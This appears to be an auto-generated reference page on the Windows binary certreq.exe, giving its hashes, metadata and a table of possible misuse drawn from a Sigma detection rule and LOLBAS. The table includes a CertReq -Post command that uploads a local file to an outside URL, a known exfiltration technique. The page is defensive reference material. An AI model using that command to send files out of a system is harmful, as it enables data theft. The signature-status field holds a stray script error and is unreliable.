certreq.exe

  • File Path: C:\windows\system32\certreq.exe
  • Description: CertReq.exe

Screenshot

certreq.exe

Hashes

Type Hash
MD5 4880B02DCFFE654496BD4A1FFEA522A6
SHA1 1CE25B5CB40CCE0EFAD553D1C8D03C670F74D1D9
SHA256 1A1A92010AAEF7107236879A992B3ACBF666F406AD063E1D3BB42D986D55F546
SHA384 0113B5CD7A07150E7C11D1A0EFA692DDFA6596C5EEC494E0FD0994F04FF974424F3430A6830D818B467DA3E9BEC559EE
SHA512 C478311B3D3AA964741F726B0BFDF71D1C6F92D791586599DB266EDCF57669C8B03612CE06E2458923D0EFB9A3F5762C399C41D398E550F36350060E56AE4A90
SSDEEP 6144:xUJwZwgr3CZKasZSzR147rMO9GfD7y8M0vDGf1j5WaplRnJfSuap:xZfrgSC48O9GfD7yLwDGl5Wa5Jf

Signature

  • Status: The file C:\windows\system32\certreq.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: CertReq.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of certreq.exe being misused. While certreq.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_susp_certreq_download.yml title: Suspicious Certreq Command to Download DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml Image\|endswith: '\certreq.exe' DRL 1.0
LOLBAS Certreq.yml Name: CertReq.exe  
LOLBAS Certreq.yml - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt  
LOLBAS Certreq.yml - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal  
LOLBAS Certreq.yml - Path: C:\Windows\System32\certreq.exe  
LOLBAS Certreq.yml - Path: C:\Windows\SysWOW64\certreq.exe  
LOLBAS Certreq.yml - IOC: certreq creates new files  
LOLBAS Certreq.yml - IOC: certreq makes POST requests  
LOLBAS Certreq.yml - Link: https://dtm.uk/certreq  

MIT License. Copyright (c) 2020-2021 Strontic.